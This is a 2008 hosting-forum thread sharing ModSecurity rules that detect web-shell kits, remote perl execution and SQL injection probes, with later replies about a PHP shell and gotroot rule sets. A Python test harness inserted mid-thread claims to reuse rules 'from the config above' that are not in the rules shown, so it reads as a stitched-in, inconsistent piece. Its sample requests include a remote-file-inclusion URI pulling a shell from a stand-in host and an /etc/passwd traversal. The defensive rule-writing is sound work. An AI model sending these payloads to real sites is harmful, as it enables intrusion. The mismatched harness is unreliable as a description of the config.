    SecRule REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    
    #Generic remote perl execution with .pl extension
    SecRule REQUEST_URI "\;(\s|\t)*perl .*\.pl"
    
    #New SEL attack seen
    SecRule REQUEST_URI|REQUEST_BODY "select.*from.*information_schema\.tables"
    
    #New SQL attack seen
    SecRule REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"
    
    #31dec
    SecRule REQUEST_URI   "/php\.txt\?"
    
    #1 jan
    SecRule REQUEST_URI   "/sql\.txt\?"
    SecRule REQUEST_URI   "bind\.(gif|jpe?g|txt|bmp|png)\?"
    
    #new unknown kits
    SecRule REQUEST_URI   "/iblis\.htm\?" 
    SecRule REQUEST_URI   "/gif\.gif\?" 
    SecRule REQUEST_URI   "/go\.php\.txt\?" 
    SecRule REQUEST_URI   "/sh[0-9]\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/iys\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/shell[0-9]\.(gif|jpe?g|txt|bmp|png)\?" 
    SecRule REQUEST_URI   "/zehir\.asp"
    SecRule REQUEST_URI   "/aflast\.txt\?"
    SecRule REQUEST_URI   "/sikat\.txt\?&cmd" 
    SecRule REQUEST_URI   "/t\.gif\?" 
    SecRule REQUEST_URI   "/phpbb_patch\?&"
    SecRule REQUEST_URI   "/phpbb2_patch\?&"
    SecRule REQUEST_URI   "/lukka\?&"
    Last edited by Frontpage1; 02-11-2008 at 09:40 AM. Reason: Update Modsec2 Config File
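To see what a few of these patterns actually catch, and how broad some of them are, here is a small harness (added here; it is not part of the post above nor of mod_security) that re-runs a handful of the rules against constructed sample requests. The regexes are copied from the rules; the URIs, the example.invalid host and the headers are made up.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# A few of the SecRule patterns from the config above, re-expressed for Python's
# re module (ModSecurity uses PCRE, but these patterns evaluate identically).
# Each entry: label, the request parts the rule's variable list inspects, regex.
RULES = [
    ("950019 Email injection", ("filename", "args", "args_names"),
     re.compile(r"[\n\r]\s*(?:to|bcc|cc)\s*:.*?\@", re.IGNORECASE)),  # t:lowercase
    ("950005 Remote file access", ("filename", "args", "args_names", "headers"),
     re.compile(r"(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)"
                r"|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)")),
    ("c99 kit", ("uri",), re.compile(r"/c99\.txt\?")),
    ("Forum shell", ("uri",), re.compile(r"showtopic=http")),
    ("Referer/ARGS site.com", ("referer", "args"), re.compile(r"site\.com")),
    ("UA Linux", ("ua",), re.compile(r"Linux")),
]

# Constructed sample requests (not taken from the thread's logs): URI, headers.
SAMPLES: Dict[str, Tuple[str, Dict[str, str]]] = {
    "rfi": ("/forum/index.php?showtopic=http://example.invalid/c99.txt?",
            {"User-Agent": "libwww-perl/5.808"}),
    "etc": ("/view.php?file=../../etc/passwd",
            {"User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"}),
    "mail": ("/contact.php?subject=hello%0Abcc:%20someone@example.invalid",
             {"User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"}),
    # An ordinary visitor: Firefox on Linux, a query argument holding a hostname.
    "benign": ("/product.php?id=42&ref=mywebsite.com",
               {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) "
                              "Gecko/20100101 Firefox/52.0"}),
}


def evaluate(uri: str, headers: Dict[str, str]) -> List[str]:
    """Return the labels of the rules that would fire on one request."""
    parts = urlsplit(uri)
    args = parse_qsl(parts.query, keep_blank_values=True)  # URL-decoded, like ARGS
    targets = {
        "uri": [uri],                        # REQUEST_URI (raw)
        "filename": [parts.path],            # REQUEST_FILENAME
        "args": [v for _, v in args],        # ARGS
        "args_names": [k for k, _ in args],  # ARGS_NAMES
        "headers": list(headers.values()),   # REQUEST_HEADERS
        "ua": [headers.get("User-Agent", "")],
        "referer": [headers.get("Referer", "")],
    }
    return [label for label, inspected, rx in RULES
            if any(rx.search(s) for part in inspected for s in targets[part])]


if __name__ == "__main__":
    for name, (uri, headers) in SAMPLES.items():
        print(f"{name:7s} -> {evaluate(uri, headers) or ['no match']}")
```

The benign visitor trips both the `Linux` user-agent rule and the `site\.com` referer/args rule, so those two would block ordinary traffic unless they are narrowed to the specific agents and hosts they were written for.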

  6. #6
    Join Date
    May 2003
    Location
    Melbourne, Australia
    Posts
    341

    EXCELLENT

    EXCELLENT THREAD.

    We're also dealing with a PHP exploit issue with the script "menro.php" being uploaded a few times recently; you might want to add that to mod_security. It's a nasty little script: it tells the hacker everything they want to know about the server and lets them do plenty of nasty things.

    Anyway - EXCELLENT THREAD !
    Last edited by bjdea1; 02-18-2008 at 07:39 PM.
    Deasoft.com Australia & USA Hosting - cPanel, WHM, VPS
    Software - WHMreseller - WHMexec - KVZcloud
    Host Repo - The Linux Web Host Knowledge Repository
    hostsearch.com.au - Host Search Australia

  7. #7
    These threads are very useful. Thank you for taking the time to help us all out.

    On a related note, does anyone have experience of the rules at gotroot.com? They seem to have put a lot of effort into them and I am thinking of deploying them. Before I do, do any of you have bad experiences of these?

  8. #8
    Join Date
    Sep 2003
    Location
    Earth!
    Posts
    55
    I'm from gotroot, we update the rules at least once a day for the new 2.5 format. The 1.x and 2.0 rulesets are no longer maintained, so you should absolutely update if you haven't already (we have rpms available for the centos/rhel/fedora folks). If you find a problem with the rules just let us know about it. Full support packages are available.
    Secure your server now: Atomic Secured Linux
    Troubleshooting Linux Firewalls in stores today

  9. #9
    Thank you for the reply, AT.
